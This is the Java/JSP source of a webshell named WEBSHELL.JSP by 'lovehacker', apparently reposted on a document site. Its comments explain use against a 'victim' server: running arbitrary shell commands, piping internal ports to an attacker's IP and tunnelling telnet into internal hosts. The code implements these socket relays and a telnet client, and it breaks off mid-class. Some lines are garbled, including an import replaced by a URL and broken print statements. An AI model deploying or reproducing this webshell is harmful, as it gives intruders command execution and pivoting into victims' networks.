JSP的WEBSHELL源代码
JSP的WEBSHELL源代码
<%
/*
* WEBSHELL.JSP
*
* Author: lovehacker
* E-mail: wangyun188@https://www.wendangku.net/doc/c416252056.html,
*
* 使用方法:
* ]http://victim/webshell.jsp?[options]
* options:
* action=piped&remoteHost=&remotePort=&myIp=&myPort=
* action=tunnel&remoteHost=&remotePort=&myPort=
* action=login&username=&password=&myPort=
* action=send&myShell=&myPort=&cmd=
* action=close&myPort=
* action=shell&cmd=
* 例子:
* action=piped&remoteHost=192.168.0.1&remotePort=25&myIp=218.0.0.1&myPort=12345 -- 将192.168.0.1的25端口与218.0.0.1的12345端口连接起来(可以先用NC监听12345端口)。适用于你无法直接访问已控制的WEB服务器的内网里某机器的某端口,而防火墙又未过滤该WEB服务器向外的连接。
* action=tunnel&remoteHost=192.168.0.1&remotePort=23&myPort=65534 -- 实现通过访问该webshell.jsp访问内网某主机telnet服务的功能。(原本想实现通过访问webshell.jsp实现对内网任意服务访问的功能,但jsp功能有限实现起来较为复杂),适用于你控制的机器只开了80端口,并且防火墙不允许它访问Internet,而你又非常想访问它内网某主机的Telnet服务:-)
* action=login&username=root&password=helloroot&myPort=65534 -- 上一步只是告诉了要Telnet那台机器,这一步才开始真正登陆,你要输入要telnet主机的正确的用户名密码才行喔,要不然谁也没办法。
* action=send&myShell=&myPort=&cmd= -- 上一步如果顺利完成,那么你就可以在上边执行你想执行的命令了。myShell这个参数是结束标记,否则无法知道数据流什么时间该结束(一定要写对喔,否则嘿嘿,就麻烦罗)。cmd这个参数就是你要执行的命令了,比如:“which ssh”,建议你这样玩:myShell=lovehacker&cmd=ls -la;echo lovehacker。
* action=close&myPort= -- 你是退出了telnet登陆,但程序在主机上开放的端口还没关闭,所以你要再执行这个命令,现场打扫干净嘛。
* action=shell&cmd= -- 在你控制的这台机器上执行命令。Unix:/bin/sh -c tar vxf xxx.tar Windows:c:\winnt\system32\cmd.exe /c type c:\winnt\win.ini
* 程序说明:
* 想通过jsp实现telnet代理的时候着实头痛了一把,每个请求都是一个新的线程,client socket 去连接
* telnet服务只能批量命令,无法实现与用户的交互,后来想了个笨办法:把telnet的过程分步完成,接
* 收到tunnel命令后,先起两个线程,一个监听端口等待连接,一个先和远程服务器建立好端口连接并一
* 直不断开,这下server socket再一次一次的收数据,一次次的转发到远程服务器,就可以记录状态,实
* 现和用户的交互了,但总觉得这办法太笨,如果用JSP实现telnet代理功能,你有更好的办法的话请一定
* 要来信告诉我。
* 版权说明:
* 本身实现Telnet的功能我也是在人家代码的基础上修改的,所以:版权没有,你可以任意修改、复制。
* 只是加了新功能别忘了Mail一份给我喔!
*
*
*/
%>
<%@ page import="java.io.*" %>
<%@ page import="https://www.wendangku.net/doc/c416252056.html,.*" %>
<%@ page import="java.util.*" %>
<%@ page import="java.awt.Dimension" %>
<%
class redirector implements Runnable
{
private redirector companion = null;
private Socket localSocket, remoteSocket;
private InputStream from;
private OutputStream to;
private byte[] buffer = new byte[4096];
public redirector(Socket local, Socket remote)
{
try {
localSocket = local;
remoteSocket = remote;
from = localSocket.getInputStream();
to = remoteSocket.getOutputStream();
} catch(Exception e) {}
}
public void couple(redirector c) {
companion = c;
Thread listen = new Thread(this);
listen.start();
}
public void decouple() { companion = null; }
public void run()
{
int count;
try {
while(companion != null) {
if((count = from.read(buffer)) < 0)
break;
to.write(buffer, 0, count);
}
} catch(Exception e) {}
try {
from.close();
to.close();
localSocket.close();
remoteSocket.close();
if(companion != null) companion.decouple();
} catch(Exception io) {}
}
}
class redirector1 implements Runnable
{
private redirector1 companion = null;
private Socket localSocket, remoteSocket; private InputStream from;
private OutputStream to;
private byte[] buffer = new byte[4096];
public redirector1(Socket local, Socket remote) {
try {
localSocket = local;
remoteSocket = remote;
from = localSocket.getInputStream();
to = remoteSocket.getOutputStream();
} catch(Exception e) {}
}
public void couple(redirector1 c) {
companion = c;
Thread listen = new Thread(this);
listen.start();
}
public void decouple() { companion = null; }
public void run()
{
String tmp = "";
int count;
try {
while(companion != null) {
if((count = from.read(buffer)) < 0) break;
tmp = new String(buffer);
if(tmp.startsWith("--GoodBye--"))
{
from.close();
to.close();
remoteSocket.close();
localSocket.close();
System.exit(1);
}
to.write(buffer, 0, count);
}
} catch(Exception e) {}
try {
if(companion != null) companion.decouple();
} catch(Exception io) {}
}
}
class piped implements Runnable
{
String remoteHost1,remoteHost2;
int remotePort1, remotePort2;
Thread listener, connection;
public piped(String raddr1,int rport1, String raddr2, int rport2)
{
remoteHost1 = raddr1; remotePort1 = rport1;
remoteHost2 = raddr2; remotePort2 = rport2;
listener = new Thread(this);
listener.setPriority(Thread.MIN_PRIORITY);
listener.start();
}
public void run()
{
Socket destinationSocket1 = null;
Socket destinationSocket2 = null;
try {
destinationSocket1 = new Socket(remoteHost1,remotePort1);
destinationSocket2 = new Socket(remoteHost2, remotePort2);
redirector r1 = new redirector(destinationSocket1, destinationSocket2);
redirector r2 = new redirector(destinationSocket2, destinationSocket1);
r1.couple(r2);
r2.couple(r1);
} catch(Exception e) {
try {
DataOutputStream os = new DataOutputStream(destinationSocket2.getOutputStream()); os.writeChars("Remote host refused connection.\n");
destinationSocket2.close();
} catch(IOException ioe) { }
}
}
}
class tunnel implements Runnable
{
String remoteHost;
int localPort, remotePort;
Thread listener, connection;
ServerSocket server;
public tunnel(int lport, String raddr, int rport)
{
localPort = lport;
remoteHost = raddr; remotePort = rport;
try {
server = new ServerSocket(localPort);
} catch(Exception e) {}
listener = new Thread(this);
listener.setPriority(Thread.MIN_PRIORITY);
listener.start();
}
public void run()
{
Socket destinationSocket = null;
try{
destinationSocket = new Socket(remoteHost, remotePort);
}catch(Exception e){}
while(true)
{
Socket localSocket = null;
try {
localSocket = server.accept();
} catch(Exception e) {
continue;
}
try {
redirector1 r1 = new redirector1(localSocket, destinationSocket); redirector1 r2 = new redirector1(destinationSocket, localSocket);
r1.couple(r2);
r2.couple(r1);
} catch(Exception e) {
try {
DataOutputStream os = new DataOutputStream(localSocket.getOutputStream()); os.writeChars("Remote host refused connection.\n");
localSocket.close();
} catch(IOException ioe) {}
continue;
}
}
}
}
class TelnetIO
{
public String toString() { return "$Id: TelnetIO.java,v 1.10 1998/02/09 10:22:18 leo Exp $"; }
private int debug = 0;
private byte neg_state = 0;
private final static byte STATE_DATA = 0;
private final static byte STATE_IAC = 1;
private final static byte STATE_IACSB = 2;
private final static byte STATE_IACWILL = 3;
private final static byte STATE_IACDO = 4;
private final static byte STATE_IACWONT = 5;
private final static byte STATE_IACDONT = 6;
private final static byte STATE_IACSBIAC = 7;
private final static byte STATE_IACSBDATA = 8;
private final static byte STATE_IACSBDATAIAC = 9;
private byte current_sb;
private final static byte IAC = (byte)255;
private final static byte EOR = (byte)239;
private final static byte WILL = (byte)251;
private final static byte WONT = (byte)252;
private final static byte DO = (byte)253;
private final static byte DONT = (byte)254;
private final static byte SB = (byte)250;
private final static byte SE = (byte)240;
private final static byte TELOPT_ECHO = (byte)1; /* echo on/off */
private final static byte TELOPT_EOR = (byte)25; /* end of record */
private final static byte TELOPT_NAWS = (byte)31; /* NA-WindowSize*/
private final static byte TELOPT_TTYPE = (byte)24; /* terminal type */
private final byte[] IACWILL = { IAC, WILL };
private final byte[] IACWONT = { IAC, WONT };
private final byte[] IACDO = { IAC, DO };
private final byte[] IACDONT = { IAC, DONT };
private final byte[] IACSB = { IAC, SB };
private final byte[] IACSE = { IAC, SE };
private final byte TELQUAL_IS = (byte)0;
private final byte TELQUAL_SEND = (byte)1;
private byte[] receivedDX;
private byte[] receivedWX;
private byte[] sentDX;
private byte[] sentWX;
private Socket socket;
private BufferedInputStream is;
private BufferedOutputStream os;
//private StatusPeer peer = this; /* peer, notified on status */
public void connect(String address, int port) throws IOException {
if(debug > 0) System.out.println("Telnet.connect("+address+","+port+")"); socket = new Socket(address, port);
is = new BufferedInputStream(socket.getInputStream());
os = new BufferedOutputStream(socket.getOutputStream());
neg_state = 0;
receivedDX = new byte[256];
sentDX = new byte[256];
receivedWX = new byte[256];
sentWX = new byte[256];
}
public void disconnect() throws IOException {
if(debug > 0) System.out.println("TelnetIO.disconnect()");
if(socket !=null) socket.close();
}
public void connect(String address) throws IOException {
connect(address, 23);
}
//public void setPeer(StatusPeer obj) { peer = obj; }
public int available() throws IOException
{
return is.available();
}
public byte[] receive() throws IOException {
int count = is.available();
byte buf[] = new byte[count];
count = is.read(buf);
if(count < 0) throw new IOException("Connection closed.");
if(debug > 1) System.out.println("TelnetIO.receive(): read bytes: "+count); buf = negotiate(buf, count);
return buf;
}
public void send(byte[] buf) throws IOException {
if(debug > 1) System.out.println("TelnetIO.send("+buf+")");
os.write(buf);
os.flush();
}
public void send(byte b) throws IOException {
if(debug > 1) System.out.println("TelnetIO.send("+b+")");
os.write(b);
os.flush();
}
private void handle_sb(byte type, byte[] sbdata, int sbcount)
throws IOException
{
if(debug > 1)
System.out.println("TelnetIO.handle_sb("+type+")");
switch (type) {
case TELOPT_TTYPE:
if (sbcount>0 && sbdata[0]==TELQUAL_SEND) {
String ttype;
send(IACSB);send(TELOPT_TTYPE);send(TELQUAL_IS);
/* FIXME: need more logic here if we use
* more than one terminal type
*/
Vector vec = new Vector(2);
vec.addElement("TTYPE");
ttype = (String)notifyStatus(vec);
if(ttype == null) ttype = "dumb";
byte[] bttype = new byte[ttype.length()];
ttype.getBytes(0,ttype.length(), bttype, 0);
send(bttype);
send(IACSE);
}
}
}
public Object notifyStatus(Vector status) {
if(debug > 0)
System.out.println("TelnetIO.notifyStatus("+status+")");
return null;
}
private byte[] negotiate(byte buf[], int count) throws IOException { if(debug > 1)
System.out.println("TelnetIO.negotiate("+buf+","+count+")");
byte nbuf[] = new byte[count];
byte sbbuf[] = new byte[count];
byte sendbuf[] = new byte[3];
byte b,reply;
int sbcount = 0;
int boffset = 0, noffset = 0;
Vector vec = new Vector(2);
while(boffset < count) {
b=buf[boffset++];
if (b>=128)
b=(byte)((int)b-256);
switch (neg_state) {
case STATE_DATA:
if (b==IAC) {
neg_state = STATE_IAC;
} else {
nbuf[noffset++]=b;
}
break;
case STATE_IAC:
switch (b) {
case IAC:
if(debug > 2)
System.out.print("IAC ");
neg_state = STATE_DATA;
nbuf[noffset++]=IAC;
break;
case WILL:
if(debug > 2)
System.out.print("WILL ");
neg_state = STATE_IACWILL; break;
case WONT:
if(debug > 2)
System.out.print("WONT ");
neg_state = STATE_IACWONT; break;
case DONT:
if(debug > 2)
System.out.print("DONT ");
neg_state = STATE_IACDONT; break;
case DO:
if(debug > 2)
System.out.print("DO ");
neg_state = STATE_IACDO; break;
case EOR:
if(debug > 2)
System.out.print("EOR ");
neg_state = STATE_DATA; break;
case SB:
if(debug > 2)
System.out.print("SB ");
neg_state = STATE_IACSB; sbcount = 0;
break;
default:
if(debug > 2)
System.out.print(
"
);
neg_state = STATE_DATA; break;
}
break;
case STATE_IACWILL:
switch(b) {
case TELOPT_ECHO:
if(debug > 2)
System.out.println("ECHO"); reply = DO;
vec = new Vector(2);
vec.addElement("NOLOCALECHO"); notifyStatus(vec);
break;
case TELOPT_EOR:
if(debug > 2)
System.out.println("EOR");
reply = DO;
break;
default:
if(debug > 2)
System.out.println(
"
);
reply = DONT;
break;
}
if(debug > 1)
System.out.println("<"+b+", WILL ="+WILL+">"); if ( reply != sentDX[b+128] ||
WILL != receivedWX[b+128]
) {
sendbuf[0]=IAC;
sendbuf[1]=reply;
sendbuf[2]=b;
send(sendbuf);
sentDX[b+128] = reply;
receivedWX[b+128] = WILL;
}
neg_state = STATE_DATA;
break;
case STATE_IACWONT:
switch(b) {
case TELOPT_ECHO:
if(debug > 2)
System.out.println("ECHO");
vec = new Vector(2);
vec.addElement("LOCALECHO");
notifyStatus(vec);
reply = DONT;
break;
case TELOPT_EOR:
if(debug > 2)
System.out.println("EOR");
reply = DONT;
break;
default:
if(debug > 2)
System.out.println(
"
);
reply = DONT;
break;
}
if ( reply != sentDX[b+128] || WONT != receivedWX[b+128]
) {
sendbuf[0]=IAC;
sendbuf[1]=reply;
sendbuf[2]=b;
send(sendbuf);
sentDX[b+128] = reply; receivedWX[b+128] = WILL;
}
neg_state = STATE_DATA; break;
case STATE_IACDO:
switch (b) {
case TELOPT_ECHO:
if(debug > 2)
System.out.println("ECHO"); reply = WILL;
vec = new Vector(2);
vec.addElement("LOCALECHO"); notifyStatus(vec);
break;
case TELOPT_TTYPE:
if(debug > 2)
System.out.println("TTYPE"); reply = WILL;
break;
case TELOPT_NAWS:
if(debug > 2)
System.out.println("NAWS"); vec = new Vector(2);
vec.addElement("NAWS"); Dimension size = (Dimension) notifyStatus(vec);
receivedDX = DO;
if(size == null)
{
/* this shouldn't happen */ send(IAC);
send(WONT);
send(TELOPT_NAWS);
reply = WONT;
sentWX = WONT;
break;
}
reply = WILL;
sentWX = WILL;
sendbuf[0]=IAC;
sendbuf[1]=WILL;
sendbuf[2]=TELOPT_NAWS;
send(sendbuf);
send(IAC);send(SB);send(TELOPT_NAWS); send((byte) (size.width >> 8));
send((byte) (size.width & 0xff)); send((byte) (size.height >> 8));
send((byte) (size.height & 0xff)); send(IAC);send(SE);
break;
default:
if(debug > 2)
System.out.println(
"
);
reply = WONT;
break;
}
if ( reply != sentWX[128+b] ||
DO != receivedDX[128+b]
) {
sendbuf[0]=IAC;
sendbuf[1]=reply;
sendbuf[2]=b;
send(sendbuf);
sentWX[b+128] = reply;
receivedDX[b+128] = DO;
}
neg_state = STATE_DATA;
break;
case STATE_IACDONT:
switch (b) {
case TELOPT_ECHO:
if(debug > 2)
System.out.println("ECHO");
reply = WONT;
vec = new Vector(2);
vec.addElement("NOLOCALECHO"); notifyStatus(vec);
break;
case TELOPT_NAWS:
if(debug > 2)
System.out.println("NAWS");
reply = WONT;
break;
default:
if(debug > 2)
System.out.println(
"
);
reply = WONT;
break;
}
if ( reply != sentWX[b+128] ||
DONT != receivedDX[b+128]
) {
send(IAC);send(reply);send(b);
sentWX[b+128] = reply;
receivedDX[b+128] = DONT;
}
neg_state = STATE_DATA;
break;
case STATE_IACSBIAC:
if(debug > 2) System.out.println(""+b+" "); if (b == IAC) {
sbcount = 0;
current_sb = b;
neg_state = STATE_IACSBDATA;
} else {
System.out.println("(bad) "+b+" ");
neg_state = STATE_DATA;
}
break;
case STATE_IACSB:
if(debug > 2) System.out.println(""+b+" "); switch (b) {
case IAC:
neg_state = STATE_IACSBIAC;
break;
default:
current_sb = b;
sbcount = 0;
neg_state = STATE_IACSBDATA;
break;
}
break;
case STATE_IACSBDATA:
if (debug > 2) System.out.println(""+b+" "); switch (b) {
case IAC:
neg_state = STATE_IACSBDATAIAC;
break;
default:
sbbuf[sbcount++] = b;
break;
}
break;
case STATE_IACSBDATAIAC:
if (debug > 2) System.out.println(""+b+" ");
switch (b) {
case IAC:
neg_state = STATE_IACSBDATA;
sbbuf[sbcount++] = IAC;
break;
case SE:
handle_sb(current_sb,sbbuf,sbcount); current_sb = 0;
neg_state = STATE_DATA;
break;
case SB:
handle_sb(current_sb,sbbuf,sbcount);
neg_state = STATE_IACSB;
break;
default:
neg_state = STATE_DATA;
break;
}
break;
default:
if (debug > 2)
System.out.println(
"This should not happen: "+
neg_state+" "
);
neg_state = STATE_DATA;
break;
}
}
buf = new byte[noffset];
System.arraycopy(nbuf, 0, buf, 0, noffset); return buf;
}
}
class TelnetConnect
{
TelnetIO tio = new TelnetIO();
int port = 0;
public TelnetConnect(int port)
{
this.port = port;
}
public void connect()
{
try {
tio.connect("localhost",port);
} catch(IOException e) {}